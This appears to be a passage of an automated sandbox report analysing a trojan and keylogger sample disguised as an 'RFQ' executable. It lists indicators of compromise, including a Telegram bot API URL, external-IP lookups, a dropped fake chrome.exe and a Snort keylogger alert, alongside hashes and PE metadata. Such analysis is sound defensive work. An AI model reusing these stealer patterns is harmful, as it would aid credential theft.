                      https://crashpad.chromium.org/RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.drfalse
                        		high
                        https://api.telegram.org/botRFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          		high
                          https://crashpad.chromium.org/bug/newRFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.drfalse
                            		high
                            http://checkip.dyndns.org/qRFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://sawebservice.red-gate.com/RFQ__637456464647.exefalse
                              		high
                              http://www.smartassembly.com/webservices/Reporting/UploadReport2RFQ__637456464647.exefalse
                              • URL Reputation: safe
                              		unknown
                              https://dsssdsa.faRFQ__637456464647.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://checkip.dyndns.orgRFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.smartassembly.com/webservices/Reporting/RFQ__637456464647.exefalse
                              • URL Reputation: safe
                              		unknown
                              http://checkip.dyndns.comRFQ__637456464647.exe, 00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newRFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.drfalse
                                  		high
                                  http://www.smartassembly.com/webservices/UploadReportLogin/RFQ__637456464647.exefalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURLRFQ__637456464647.exefalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://checkip.dyndns.org4JkRFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  132.226.8.169
                                  		checkip.dyndns.comUnited States
                                  		16989UTMEMUStrue

                                  Private

                                  IP
                                  192.168.2.1

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:632544
                                  Start date and time: 23/05/202218:58:492022-05-23 18:58:49 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 10m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:RFQ__637456464647.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:29
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@6/5@2/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HDC Information:
                                  • Successful, ratio: 16.1% (good quality ratio 13%)
                                  • Quality average: 58.1%
                                  • Quality standard deviation: 37.6%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                                  • Execution Graph export aborted for target chrome.exe, PID 6672 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  19:00:24API Interceptor1x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RFQ__63745646464_94dd9d68755d61cc97c9e42d0ec1b28c5989ec6_083b13b0_1b958159\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):1.0802804484479727
                                  Encrypted:false
                                  SSDEEP:192:WOyEvUsxHBUZMXSaKtXfW/u7s4S274Itw:ZyEvUSBUZMXSah/u7s4X4Itw
                                  MD5:E56BC667B3B678430631F7CE3B8BBD4C
                                  SHA1:EA08F52BDD81A1D5BD03C34A20802621A13A5E8C
                                  SHA-256:3C7F3BEF460243B93180F3CCBD3CBC10971A29097D21F53C4B57598568A8058C
                                  SHA-512:F0ED9A2F476CD8B0899F8234DF82D1FFE2480992EC4EAE7A3957214828AFE6A64B9DCF86399061B7889A108F69F41485A778C450FBDC86D64B8B15D2E69B33D4
                                  Malicious:false
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.8.3.1.2.2.0.5.7.1.0.4.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.8.3.1.2.2.2.9.1.4.7.8.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.a.a.d.a.1.6.-.4.1.d.c.-.4.9.d.f.-.a.e.5.1.-.3.4.8.f.7.9.c.5.3.0.7.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.5.2.5.6.8.f.-.b.b.9.9.-.4.8.f.2.-.b.a.9.1.-.9.a.0.e.c.b.9.8.4.a.0.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.F.Q._._.6.3.7.4.5.6.4.6.4.6.4.7...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.J.x.I.I.a.R.U.T.v.a.L.x.e.x.P.W.T.L.b.b.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.8.-.0.0.0.1.-.0.0.1.d.-.9.b.e.e.-.a.2.f.7.1.1.6.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.d.2.8.a.4.2.a.c.e.9.6.7.0.f.5.3.9.7.b.7.b.0.8.5.f.4.b.9.c.f.0.0.0.0.0.0.0.0.!.0.0.0.0.5.9.2.a.8.1.4.a.4.2.8.c.8.a.5.d.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7284.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Tue May 24 02:00:21 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):265529
                                  Entropy (8bit):3.312337303087705
                                  Encrypted:false
                                  SSDEEP:3072:rkHORSy0dv9UCgUnOw9gIOgF5xlH0DhmGndsTjd+pe:rkkTcTjP9RpDxt0AGFp
                                  MD5:7973C58C32915FBA6B5E4EEE9BF12854
                                  SHA1:8FBE6CBECD95C5CE84DC87F9A6399D06FD2BDBBC
                                  SHA-256:0583DBAE1CBBF287351119BDE87703268E64DA8D430F9D3C33A9D99C185432B2
                                  SHA-512:16E6182D38A8D0AB550B3FA310E6FC81E84E8AEEF686015B9050A2F8CB1A74D6C406CEFBC0A830E496F8655DEADB904F7444CA7835083ECBF4B1235098380EE9
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP....... .......5<.b............t.......................T...p"...........T..........`.......8...........T............A..)............"...........$...................................................................U...........B......H%......GenuineIntelW...........T............<.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER78ED.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8422
                                  Entropy (8bit):3.6962392631754497
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNicG6yVG6YWhSUvlCvGgmfZF3S3Cprz89bphsfSYjm:RrlsNi16yVG6YgSUvlzgmf73S7pafSx
                                  MD5:DB6D045DBC6C75AE674930E621C24D0C
                                  SHA1:EC5D9E89F492C938C6B45FD7948D6D7E630575C0
                                  SHA-256:6763D58AA2DA5B1C0DB34B2CD54ABF3DEA1334933A99F235945CFDD3CD6B445A
                                  SHA-512:27D6CDA8DA201F33BCEFFBD510B010C421FD95B0D2871636315AA63C3147B43E11CB310388FB9AD143452D723651EFF61E9350C20A72AD7EB47BF5352048A18A
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.1.2.<./.P.i.d.>.......

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A56.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4794
                                  Entropy (8bit):4.506229802328503
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsjJgtWI9AGWgc8sqYj68fm8M4JKOwO7FnHno+q8vrOwOsUPOY4TsK3QE:uITf9nHgrsqYbJ7wcIKawyPO1Y1ud
                                  MD5:10BD2D57F1961B27D477C05A55D89E59
                                  SHA1:1ABFAD5821C4BC61962184488F33565531BB59F9
                                  SHA-256:40DBD1A60D73AA328FAB8171384B79764B1A0F1A934FB1038CC0BE506F2CEB11
                                  SHA-512:D8A24722E437F15B220AF4A2AC6BB5DA80E8F6B90C25CA69C3FCE203329D755953F8F9B739039FC3EE766DFB9D7273A9790535D741CBB8856F02A386D36C828F
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1528511" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                  C:\Users\user\AppData\Local\Temp\chrome.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):2622352
                                  Entropy (8bit):6.584925607886023
                                  Encrypted:false
                                  SSDEEP:49152:ZkwWDBRk5Swp1oFSFb8XUK+3crWECSP/cESM0RCZ/Sf8peUTbVkyC:2TX79FXCaSMHpC
                                  MD5:7F916511A313837EFCDE9E4112A64E5B
                                  SHA1:6A2A2427CF1D888CB40A18527478C84DEDF1DB61
                                  SHA-256:F342AF2B1E3DD9BA90C10F643EC1F50459EFBB5912496E8AC553682C2B7A9F6E
                                  SHA-512:A2F92AE37D6ECD16D7B4312EA2548F494D01BD386A439E05258073F4038FCFA60BD7D79FCB8CA5B285BAC121799826B87655EC594F7B4A9CCF5DA70CE3273E1B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Reputation:low
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....|b.........."...........................@..............................(.......(...`..........................................u ......u .P.....#.P.....".......'..#....(..#...L .8...................XK .(....!..0............} .....`f .`....................text...x........................... ..`.rdata...#... ...$..................@..@.data....+...P!......,!.............@....pdata........".......!.............@..@.00cfg..(....`#.......".............@..@.retplne$....p#......."..................tls....9.....#.......".............@...CPADinfo8.....#.......".............@..._RDATA........#.......".............@..@.rsrc...P.....#.......".............@..@.reloc...#....(..$....'.............@..B................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.991836040381107
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:RFQ__637456464647.exe
                                  File size:2844160
                                  MD5:b4bc907e8d48e8f09b4d9fdd8d416599
                                  SHA1:592a814a428c8a5de3f06245996fc775e8dc987f
                                  SHA256:7f7804a5460695dae61e378d733f0a613083e84c654ea6264a5276944b33f943
                                  SHA512:b74608846f9e494789e52b79e1aab9fd5fa7918b46441cc0cf2ee0d2883151c327180b4119bbeae6bd83360dcedc8c6142e6fab0b56650b818aa51a2527d6759
                                  SSDEEP:49152:oXJTCTSfReUawVjvGdhAD7E3IJ6daAQeFdjwCE1/02Xro9+83qpK:suoRZawVjvGdhGE3IJA/jwD82013q
                                  TLSH:A9D52383B38AA47AF0BC25B4DCC3EB834F65579C5665FCD62A8151AC38253BBE570213
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.................Z+..........y+.. ....+...@.. ........................+.......+...@................................

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x6b791a
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x628B062E [Mon May 23 03:57:34 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2b78d00x4a.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2b80000x72a.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ba0000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x2b59200x2b5a00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rsrc0x2b80000x72a0x800False0.31591796875data4.48924436504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x2ba0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_VERSION0x2b80b80x27cdata
                                  RT_MANIFEST0x2b83340x1faXML 1.0 document, ASCII text, with very long lines, with no line terminators
                                  RT_MANIFEST0x2b85300x1faXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Version Infos

                                  DescriptionData
                                  Translation0x0000 0x04b0
                                  LegalCopyright
                                  Assembly Version0.0.0.0
                                  InternalNameJxIIaRUTvaLxexPWTLbbe.exe
                                  FileVersion0.0.0.0
                                  ProductVersion0.0.0.0
                                  FileDescription
                                  OriginalFilenameJxIIaRUTvaLxexPWTLbbe.exe

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.3132.226.8.16949740802842536 05/23/22-19:00:12.710166TCP2842536ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check4974080192.168.2.3132.226.8.169

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 23, 2022 19:00:09.422519922 CEST4974080192.168.2.3132.226.8.169
                                  May 23, 2022 19:00:12.433237076 CEST4974080192.168.2.3132.226.8.169
                                  May 23, 2022 19:00:12.709538937 CEST8049740132.226.8.169192.168.2.3
                                  May 23, 2022 19:00:12.709647894 CEST4974080192.168.2.3132.226.8.169
                                  May 23, 2022 19:00:12.710165977 CEST4974080192.168.2.3132.226.8.169
                                  May 23, 2022 19:00:12.986522913 CEST8049740132.226.8.169192.168.2.3
                                  May 23, 2022 19:00:13.988107920 CEST8049740132.226.8.169192.168.2.3
                                  May 23, 2022 19:00:14.126456022 CEST4974080192.168.2.3132.226.8.169
                                  May 23, 2022 19:01:18.987670898 CEST8049740132.226.8.169192.168.2.3
                                  May 23, 2022 19:01:18.987759113 CEST4974080192.168.2.3132.226.8.169
                                  May 23, 2022 19:01:54.057121992 CEST4974080192.168.2.3132.226.8.169
                                  May 23, 2022 19:01:54.333545923 CEST8049740132.226.8.169192.168.2.3

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 23, 2022 19:00:09.279763937 CEST6485153192.168.2.38.8.8.8
                                  May 23, 2022 19:00:09.298605919 CEST53648518.8.8.8192.168.2.3
                                  May 23, 2022 19:00:09.312563896 CEST4931653192.168.2.38.8.8.8
                                  May 23, 2022 19:00:09.331444979 CEST53493168.8.8.8192.168.2.3

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  May 23, 2022 19:00:09.279763937 CEST192.168.2.38.8.8.80xc5eeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.312563896 CEST192.168.2.38.8.8.80x2cceStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  May 23, 2022 19:00:09.298605919 CEST8.8.8.8192.168.2.30xc5eeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST8.8.8.8192.168.2.30xc5eeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST8.8.8.8192.168.2.30xc5eeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST8.8.8.8192.168.2.30xc5eeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST8.8.8.8192.168.2.30xc5eeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST8.8.8.8192.168.2.30xc5eeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST8.8.8.8192.168.2.30x2cceNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST8.8.8.8192.168.2.30x2cceNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST8.8.8.8192.168.2.30x2cceNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST8.8.8.8192.168.2.30x2cceNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST8.8.8.8192.168.2.30x2cceNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST8.8.8.8192.168.2.30x2cceNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • checkip.dyndns.org

